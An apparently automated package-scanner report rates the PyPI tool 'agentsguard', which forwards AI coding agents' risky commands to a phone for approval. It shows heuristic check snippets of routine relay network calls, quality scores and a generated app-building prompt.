agentsguard

v0.3.1 suspicious
6.0
Medium Risk

Approve or deny your AI coding agent's risky commands from your phone, with an audit trail. Works with Claude Code and OpenAI Codex.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package shows moderate risk due to network communication patterns and code obfuscation, which could potentially be used for unauthorized data transmission or hiding malicious activities.

  • High network risk
  • Significant obfuscation risk
Per-check LLM notes
  • Network: The network patterns suggest the package may be communicating with external servers which could indicate legitimate functionality but also raises concerns about potential unauthorized data transmission.
  • Shell: No shell execution patterns were detected, indicating low risk for direct system command execution.
  • Obfuscation: The code shows signs of obfuscation which could be used to hide malicious activities, increasing suspicion.
  • Credentials: No clear patterns of credential harvesting detected, but further investigation into the 'scan' function is recommended.
  • Metadata: The maintainer has only one package and the repository is not found, which raises some suspicion but does not conclusively indicate malice.

📦 Package Quality Overall: Low (4.8/10)

✦ High Test Suite 9.0

Test suite present — 5 test file(s) found

  • 5 test file(s) detected (e.g. __init__.py)
◈ Medium Documentation 5.0

Some documentation present

  • Detailed PyPI description (4446 chars)
○ Low Contributing Guide 4.0

No contributing guide or governance files found

  • Development Status classifier >= Beta
◈ Medium Type Annotations 5.0

Partial type annotation coverage

  • 90 type-annotated function signatures detected in source
○ Low Multiple Contributors 1.0

Could not retrieve contributor data from GitHub

  • GitHub API error: 404

🔬 Heuristic Checks

Outbound Network Calls score 9.0

Found 6 network call pattern(s)

  • False try: r = requests.get(f"{url.rstrip('/')}/health", timeout=timeout) retur
  • load + secret.""" resp = requests.post( f"{relay_url.rstrip('/')}/pair/start", js
  • try: r = requests.get(f"{relay_url.rstrip('/')}/pair/await", params={"wait": 25},
  • err) try: r = requests.post( f"{base}/cli/approvals", json={"c
  • try: requests.post( f"{base}/cli/approvals/{approval_i
  • try: pr = requests.get(f"{base}/cli/approvals/{approval_id}", params={"wait": 20},
Code Obfuscation score 2.0

Found 1 obfuscation pattern(s)

  • ol_input.command). leak = __import__("agentguard.secrets_scan", fromlist=["scan"]).scan(cli._scannable("apply_patch", {"command": SECRET_PATCH
Shell / Subprocess Execution

No shell execution patterns detected

Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History score 3.0

Repository not found (deleted or private)

  • Repository not found (deleted or private)
Maintainer History score 2.0

1 maintainer concern(s) found

  • Author "AgentGuard" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agentsguard 
Develop a mobile-friendly web application named 'GuardianCode' using Python's 'agentsguard' package, which allows users to monitor and control their AI coding agents through their smartphones. This app will serve as a security layer between the user and their AI coding assistants, ensuring that no harmful or unauthorized commands are executed.

**Core Features:**
1. **Real-Time Monitoring:** Users should be able to see real-time updates on the actions their AI coding agent is attempting to perform.
2. **Approval/Denial System:** Users must have the ability to approve or deny specific actions requested by the AI coding agent via their smartphone. This approval/denial process should be instantaneous and secure.
3. **Audit Trail:** Every action attempted by the AI coding agent, whether approved or denied, should be logged in an audit trail accessible to the user.
4. **Mobile-Friendly Interface:** The web application must have a clean, intuitive interface designed specifically for use on mobile devices.
5. **Integration with Popular AI Coding Agents:** The application should support integration with popular AI coding agents like Claude Code and OpenAI Codex.

**How 'agentsguard' Package is Utilized:**
- Use 'agentsguard' to intercept command requests from the AI coding agent before they are executed.
- Employ the package's functionality to send these intercepted commands to the user's smartphone for approval or denial.
- Leverage the logging capabilities of 'agentsguard' to maintain an audit trail of all actions attempted by the AI coding agent.

**Development Steps:**
1. Set up a Flask backend server to handle communication between the AI coding agent and the user's smartphone.
2. Integrate the 'agentsguard' package into the Flask application to manage command interception and approval processes.
3. Develop a React frontend for the mobile-friendly web application, focusing on simplicity and usability.
4. Implement real-time data streaming between the backend and frontend using WebSockets to ensure users receive instant updates on their AI coding agent's actions.
5. Test the application thoroughly to ensure seamless interaction between the AI coding agent, the Flask backend, and the React frontend.
6. Deploy the application to a cloud service provider like AWS or Heroku for public access.